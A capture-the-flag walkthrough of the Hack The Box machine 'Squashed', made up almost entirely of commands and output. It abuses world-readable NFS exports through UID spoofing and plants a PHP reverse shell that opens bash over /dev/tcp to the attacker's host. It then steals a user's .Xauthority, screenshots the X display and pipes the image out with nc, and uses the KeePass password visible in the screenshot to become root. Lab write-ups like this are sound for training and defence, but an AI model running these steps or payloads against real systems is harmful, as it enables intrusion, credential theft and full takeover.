Squashed
Wed, 23 October 2024
Platform: Hack The Box
sudo nmap 10.10.11.191 -sV -Pn -r -g53 -D 1.1.1.1 -p- --min-rate=3000 -sC
Nmap scan report for 10.10.11.191
Host is up (0.064s latency).
Not shown: 65527 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 48:ad:d5:b8:3a:9f:bc:be:f7:e8:20:1e:f6:bf:de:ae (RSA)
| 256 b7:89:6c:0b:20:ed:49:b2:c1:86:7c:29:92:74:1c:1f (ECDSA)
|_ 256 18:cd:9d:08:a6:21:a8:b8:b6:f7:9f:8d:40:51:54:fb (ED25519)
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
|_http-title: Built Better
|_http-server-header: Apache/2.4.41 (Ubuntu)
111/tcp open rpcbind 2-4 (RPC #100000)
| rpcinfo:
| program version port/proto service
| 100000 2,3,4 111/tcp rpcbind
| 100000 2,3,4 111/udp rpcbind
| 100000 3,4 111/tcp6 rpcbind
| 100000 3,4 111/udp6 rpcbind
| 100003 3 2049/udp nfs
| 100003 3 2049/udp6 nfs
| 100003 3,4 2049/tcp nfs
| 100003 3,4 2049/tcp6 nfs
| 100005 1,2,3 33604/udp6 mountd
| 100005 1,2,3 33823/tcp mountd
| 100005 1,2,3 42949/tcp6 mountd
| 100005 1,2,3 45740/udp mountd
| 100021 1,3,4 39767/tcp6 nlockmgr
| 100021 1,3,4 45651/tcp nlockmgr
| 100021 1,3,4 46474/udp6 nlockmgr
| 100021 1,3,4 54048/udp nlockmgr
| 100227 3 2049/tcp nfs_acl
| 100227 3 2049/tcp6 nfs_acl
| 100227 3 2049/udp nfs_acl
|_ 100227 3 2049/udp6 nfs_acl
2049/tcp open nfs 3-4 (RPC #100003)
33823/tcp open mountd 1-3 (RPC #100005)
36799/tcp open mountd 1-3 (RPC #100005)
45651/tcp open nlockmgr 1-4 (RPC #100021)
51125/tcp open mountd 1-3 (RPC #100005)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
showmount -e 10.10.11.191
Export list for 10.10.11.191:
/home/ross *
/var/www/html *
sudo mkdir /mnt/ross
sudo mkdir /mnt/html
sudo mount -t nfs 10.10.11.191:/home/ross /mnt/ross -o nolock
sudo mount -t nfs 10.10.11.191:/var/www/html /mnt/html -o nolock
cd /mnt/ross
ls
Desktop Documents Downloads Music Pictures Public Templates Videos
tree -apug /mnt/ross
[drwxr-xr-x 1001 1001 ] /mnt/ross
├── [-rw------- 1001 1001 ] .Xauthority
├── [lrwxrwxrwx root root ] .bash_history -> /dev/null
├── [drwx------ 1001 1001 ] .cache [error opening dir]
├── [drwx------ 1001 1001 ] .config [error opening dir]
├── [drwx------ 1001 1001 ] .gnupg [error opening dir]
├── [drwx------ 1001 1001 ] .local [error opening dir]
├── [lrwxrwxrwx root root ] .viminfo -> /dev/null
├── [-rw------- 1001 1001 ] .xsession-errors
├── [-rw------- 1001 1001 ] .xsession-errors.old
├── [drwxr-xr-x 1001 1001 ] Desktop
├── [drwxr-xr-x 1001 1001 ] Documents
│ └── [-rw-rw-r-- 1001 1001 ] Passwords.kdbx
├── [drwxr-xr-x 1001 1001 ] Downloads
├── [drwxr-xr-x 1001 1001 ] Music
├── [drwxr-xr-x 1001 1001 ] Pictures
├── [drwxr-xr-x 1001 1001 ] Public
├── [drwxr-xr-x 1001 1001 ] Templates
└── [drwxr-xr-x 1001 1001 ] Videos
13 directories, 6 files
tree -apug /mnt/html
[drwxr-xr-- 2017 www-data] /mnt/html
# Both exports are mountable from any host (`*`) and the server honours whatever
# UID the client presents, so a local account given ross's UID (1001) can read
# his home directory. This is the misconfiguration that makes the rest possible.
sudo useradd mountuser
sudo usermod -u 1001 -g www-data mountuser
tree -apug /mnt/ross
[drwxr-xr-x mountuser mountuser] /mnt/ross
├── [-rw------- mountuser mountuser] .Xauthority
├── [lrwxrwxrwx root root ] .bash_history -> /dev/null
├── [drwx------ mountuser mountuser] .cache [error opening dir]
├── [drwx------ mountuser mountuser] .config [error opening dir]
├── [drwx------ mountuser mountuser] .gnupg [error opening dir]
├── [drwx------ mountuser mountuser] .local [error opening dir]
├── [lrwxrwxrwx root root ] .viminfo -> /dev/null
├── [-rw------- mountuser mountuser] .xsession-errors
├── [-rw------- mountuser mountuser] .xsession-errors.old
├── [drwxr-xr-x mountuser mountuser] Desktop
├── [drwxr-xr-x mountuser mountuser] Documents
│ └── [-rw-rw-r-- mountuser mountuser] Passwords.kdbx
├── [drwxr-xr-x mountuser mountuser] Downloads
├── [drwxr-xr-x mountuser mountuser] Music
├── [drwxr-xr-x mountuser mountuser] Pictures
├── [drwxr-xr-x mountuser mountuser] Public
├── [drwxr-xr-x mountuser mountuser] Templates
└── [drwxr-xr-x mountuser mountuser] Videos
tree -apug /mnt/html
[drwxr-xr-- 2017 www-data] /mnt/html
sudo usermod -u 2017 -g www-data mountuser
sudo su mountuser -c bash
cd /mnt/html
tree -apug
[drwxr-xr-- mountuser www-data] .
├── [-rw-r--r-- mountuser www-data] .htaccess
├── [drwxr-xr-x mountuser www-data] css
│ ├── [-rwxr-xr-x mountuser www-data] .DS_Store
│ ├── [-rwxr-xr-x mountuser www-data] animate.min.css
│ ├── [-rwxr-xr-x mountuser www-data] bootstrap-grid.css
│ ├── [-rwxr-xr-x mountuser www-data] bootstrap-grid.css.map
│ ├── [-rwxr-xr-x mountuser www-data] bootstrap-grid.min.css
│ ├── [-rwxr-xr-x mountuser www-data] bootstrap-grid.min.css.map
│ ├── [-rwxr-xr-x mountuser www-data] bootstrap-reboot.css
│ ├── [-rwxr-xr-x mountuser www-data] bootstrap-reboot.css.map
│ ├── [-rwxr-xr-x mountuser www-data] bootstrap-reboot.min.css
│ ├── [-rwxr-xr-x mountuser www-data] bootstrap-reboot.min.css.map
│ ├── [-rwxr-xr-x mountuser www-data] bootstrap.css
│ ├── [-rwxr-xr-x mountuser www-data] bootstrap.css.map
│ ├── [-rwxr-xr-x mountuser www-data] bootstrap.min.css
│ ├── [-rwxr-xr-x mountuser www-data] bootstrap.min.css.map
│ ├── [-rwxr-xr-x mountuser www-data] default-skin.css
│ ├── [-rwxr-xr-x mountuser www-data] font-awesome.min.css
│ ├── [-rwxr-xr-x mountuser www-data] icomoon.css
│ ├── [-rwxr-xr-x mountuser www-data] jquery-ui.css
│ ├── [-rwxr-xr-x mountuser www-data] jquery.fancybox.min.css
│ ├── [-rwxr-xr-x mountuser www-data] jquery.mCustomScrollbar.min.css
│ ├── [-rwxr-xr-x mountuser www-data] meanmenu.css
│ ├── [-rwxr-xr-x mountuser www-data] nice-select.css
│ ├── [-rwxr-xr-x mountuser www-data] normalize.css
│ ├── [-rwxr-xr-x mountuser www-data] owl.carousel.min.css
│ ├── [-rwxr-xr-x mountuser www-data] responsive.css
│ ├── [-rwxr-xr-x mountuser www-data] slick.css
│ └── [-rwxr-xr-x mountuser www-data] style.css
├── [drwxr-xr-x mountuser www-data] images
│ ├── [-rwxr-xr-x mountuser www-data] banner-bg.png
│ ├── [-rwxr-xr-x mountuser www-data] bg-1.png
│ ├── [-rwxr-xr-x mountuser www-data] contact-bg.png
│ ├── [-rwxr-xr-x mountuser www-data] fb-icon.png
│ ├── [-rwxr-xr-x mountuser www-data] footer-logo.png
│ ├── [-rwxr-xr-x mountuser www-data] header-bg.png
│ ├── [-rwxr-xr-x mountuser www-data] icon-1.png
│ ├── [-rwxr-xr-x mountuser www-data] icon-2.png
│ ├── [-rwxr-xr-x mountuser www-data] icon-3.png
│ ├── [-rwxr-xr-x mountuser www-data] icon-4.png
│ ├── [-rwxr-xr-x mountuser www-data] img-1.png
│ ├── [-rwxr-xr-x mountuser www-data] img-2.png
│ ├── [-rwxr-xr-x mountuser www-data] img-3.png
│ ├── [-rwxr-xr-x mountuser www-data] img-4.png
│ ├── [-rwxr-xr-x mountuser www-data] img-5.png
│ ├── [-rwxr-xr-x mountuser www-data] img-6.png
│ ├── [-rwxr-xr-x mountuser www-data] img-7.png
│ ├── [-rwxr-xr-x mountuser www-data] img-8.png
│ ├── [-rwxr-xr-x mountuser www-data] img-9.png
│ ├── [-rwxr-xr-x mountuser www-data] instagram-icon.png
│ ├── [-rwxr-xr-x mountuser www-data] left-arrow.png
│ ├── [-rwxr-xr-x mountuser www-data] linkedin-icon.png
│ ├── [-rwxr-xr-x mountuser www-data] logo.png
│ ├── [-rwxr-xr-x mountuser www-data] quote-icon.png
│ ├── [-rwxr-xr-x mountuser www-data] right-arrow.png
│ ├── [-rwxr-xr-x mountuser www-data] search-icon.png
│ └── [-rwxr-xr-x mountuser www-data] twitter-icon.png
├── [-rw-r----- mountuser www-data] index.html
└── [drwxr-xr-x mountuser www-data] js
├── [-rwxr-xr-x mountuser www-data] bootstrap.bundle.min.js
├── [-rwxr-xr-x mountuser www-data] custom.js
├── [-rwxr-xr-x mountuser www-data] jquery-3.0.0.min.js
├── [-rwxr-xr-x mountuser www-data] jquery.mCustomScrollbar.concat.min.js
├── [-rwxr-xr-x mountuser www-data] jquery.min.js
├── [-rwxr-xr-x mountuser www-data] plugin.js
└── [-rwxr-xr-x mountuser www-data] popper.min.js
file Passwords.kdbx
Passwords.kdbx: Keepass password database 2.x KDBX
locate 2john | grep 'keepass'
/usr/sbin/keepass2john
keepass2john -h
Usage: keepass2john [-k <keyfile>] <.kdbx database(s)>
keepass2john Passwords.kdbx
! Passwords.kdbx : File version '40000' is currently not supported!
ls -la
total 56
drwxr-xr-- 5 mountuser www-data 4096 Oct 22 23:30 .
drwxr-xr-x 7 root root 4096 Oct 22 23:04 ..
-rw-r--r-- 1 mountuser www-data 44 Oct 21 2022 .htaccess
drwxr-xr-x 2 mountuser www-data 4096 Oct 22 23:30 css
drwxr-xr-x 2 mountuser www-data 4096 Oct 22 23:30 images
-rw-r----- 1 mountuser www-data 32532 Oct 22 23:30 index.html
drwxr-xr-x 2 mountuser www-data 4096 Oct 22 23:30 js
nano shell.php
<?php
// Reverse-shell stub written into the NFS-exported web root (/var/www/html)
// and triggered by an HTTP request; it runs as the web server's user
// (uid 2017 / alex, as the `id` output further down shows).
$lhost = "10.10.16.7";
$lport = 4435;
// This call blocks until the interactive shell exits, so the fsockopen()
// fallback below is only reached afterwards. From a detection standpoint the
// indicator is the web server process spawning bash with a /dev/tcp redirect.
exec("bash -c 'bash -i >& /dev/tcp/$lhost/$lport 0>&1'");
$sock = fsockopen($lhost, $lport);
if ($sock) {
// Assumes the socket opened above landed on fd 3 — not checked anywhere here.
exec("sh <&3 >&3 2>&3");
}
?>
curl http://10.10.11.191/shell.php
nc -lvnp 4435
Listening on 0.0.0.0 4435
Connection received on 10.10.11.191 48450
id
uid=2017(alex) gid=2017(alex) groups=2017(alex)
cat /home/alex/user.txt
c52a86aa52d8fcb98d745aaadeb7beae
[*] Linpeas...
╔══════════╣ Active Ports
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#open-ports
tcp 0 0 0.0.0.0:33823 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:36799 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:2049 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:111 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:45651 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:51125 0.0.0.0:* LISTEN -
tcp 0 0 127.0.0.53:53 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:22 0.0.0.0:* LISTEN -
tcp 0 0 127.0.0.1:631 0.0.0.0:* LISTEN -
tcp6 0 0 :::2049 :::* LISTEN -
tcp6 0 0 :::42949 :::* LISTEN -
tcp6 0 0 :::32875 :::* LISTEN -
tcp6 0 0 :::111 :::* LISTEN -
tcp6 0 0 :::80 :::* LISTEN -
tcp6 0 0 :::35443 :::* LISTEN -
tcp6 0 0 :::22 :::* LISTEN -
tcp6 0 0 :::39767 :::* LISTEN -
tcp6 0 0 ::1:631 :::* LISTEN -
╔══════════╣ Users with console
alex:x:2017:2017::/home/alex:/bin/bash
root:x:0:0:root:/root:/bin/bash
ross:x:1001:1001::/home/ross:/bin/sh
╔══════════╣ Analyzing Keepass Files (limit 70)
-rw-rw-r-- 1 ross ross 1365 Oct 19 2022 /home/ross/Documents/Passwords.kdbx
╔══════════╣ Analyzing X11 Files (limit 70)
-rw------- 1 ross ross 57 Oct 21 18:28 /home/ross/.Xauthority
╔══════════╣ Interesting GROUP writable files (not in Home) (max 500)
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#writable-files
Group alex:
/var/translations
/var/images
/var/images/pull_images.sh
╔══════════╣ Files inside others home (limit 20)
/home/ross/.xsession-errors.old
/home/ross/Documents/Passwords.kdbx
/home/ross/.xsession-errors
/home/ross/.Xauthority
w
22:54:57 up 1 day, 4:26, 1 user, load average: 0.00, 0.00, 0.00
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
ross tty7 :0 Mon18 28:26m 1:27 0.03s /usr/libexec/gnome-session-binary --systemd --session=gnome
sudo pkill -u mountuser
sudo usermod -u 1001 -g www-data mountuser
sudo su mountuser -c bash
cd /mnt/ross
cp .Xauthority /dev/shm
sudo pkill -u mountuser
sudo usermod -u 2017 -g www-data mountuser
curl 10.10.16.7:8000/.Xauthority -o /dev/shm/.Xauthority
python3 -m http.server
Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...
10.10.11.191 - - [23/Oct/2024 00:42:03] "GET /.Xauthority HTTP/1.1" 200 -
export HOME=/home/alex
cp /dev/shm/.Xauthority /home/alex
w
22:54:57 up 1 day, 4:26, 1 user, load average: 0.00, 0.00, 0.00
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
ross tty7 :0 Mon18 28:26m 1:27 0.03s /usr/libexec/gnome-session-binary --systemd --session=gnome
xwininfo -root -tree -display :0
xwininfo: Window id: 0x533 (the root window) (has no name)
Root window id: 0x533 (the root window) (has no name)
Parent window id: 0x0 (none)
26 children:
0x80000b "gnome-shell": ("gnome-shell" "Gnome-shell") 1x1+-200+-200 +-200+-200
1 child:
0x80000c (has no name): () 1x1+-1+-1 +-201+-201
0x800021 (has no name): () 802x575+-1+26 +-1+26
1 child:
0x1e00006 "Passwords - KeePassXC": ("keepassxc" "keepassxc") 800x536+1+38 +0+64
1 child:
0x1e000fe "Qt NET_WM User Time Window": () 1x1+-1+-1 +-1+63
0x1e00008 "Qt Client Leader Window": () 1x1+0+0 +0+0
0x800017 (has no name): () 1x1+-1+-1 +-1+-1
0x2000001 "keepassxc": ("keepassxc" "Keepassxc") 10x10+10+10 +10+10...
xwd -root -screen -silent -display :0 > screenshot.xwd
cat screenshot.xwd | nc 10.10.16.7 4436
nc -lvnp 4436 > screenshot.xwd
Listening on 0.0.0.0 4436
Connection received on 10.10.11.191 32814
ls
screenshot.xwd
convert screenshot.xwd screenshot.png
[*] Password is visible in screenshot...
cah$mei7rai9A
root:cah$mei7rai9A
su root
Password: cah$mei7rai9A
id
uid=0(root) gid=0(root) groups=0(root)
cat /root/root.txt
8f019ca9673d58592fbdf31f309dd1c1